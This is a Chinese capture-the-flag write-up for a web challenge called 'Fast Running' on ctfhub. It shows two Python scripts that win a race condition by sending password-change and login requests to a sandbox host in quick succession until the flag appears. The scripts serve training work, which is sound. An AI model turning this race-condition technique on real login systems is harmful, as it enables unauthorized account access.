2017-赛客夏令营-Web-Fast Running wp

题目是在ctfhub上做的：

进去是一个登录界面

有个修改密码选项

修改密码123456

修改成功，重新登录的时候还是显示密码错误

根据题目fast running 猜测在修改密码完成的时候后台又把密码给改了，我们要在他改密码前登录，用python双线程竞争

import threading
import time
import requests

s=requests.session()

class MyThread(threading.Thread):
    def __init__(self, n):
        threading.Thread.__init__(self)
        self.n = n
    def run(self):
          getflag(self.n)


def getflag(n):
    if n == 1:
        while True:
            c1 = s.get("http://challenge-1a46a0157f755381.sandbox.ctfhub.com:10080/change_passwd.php?passwd=123456&passwd_confirm=123456")
    else:
        while True:
            c2 = s.get("http://challenge-1a46a0157f755381.sandbox.ctfhub.com:10080/login_check.php?passwd=123456")
            print(c2.text)


if __name__ == '__main__':
    t1 = MyThread(1)
    t2 = MyThread(2)
    t1.start()
    t2.start()

拿到了flag

后来想了一下难道一定要多线程吗，就试了一下更简单的

import threading
import time
import requests

s = requests.session()

def run1():
    c1 = s.get("http://challenge-1a46a0157f755381.sandbox.ctfhub.com:10080/change_passwd.php?passwd=123456&passwd_confirm=123456")

def run2():
    c2 = s.get("http://challenge-1a46a0157f755381.sandbox.ctfhub.com:10080/login_check.php?passwd=123456")
    print(c2.text)



if __name__ == '__main__':
    while True:
        run1()
        run2()

发现flag也出来了

看来是我多虑了 直接简单的两个函数跑一跑也可以出答案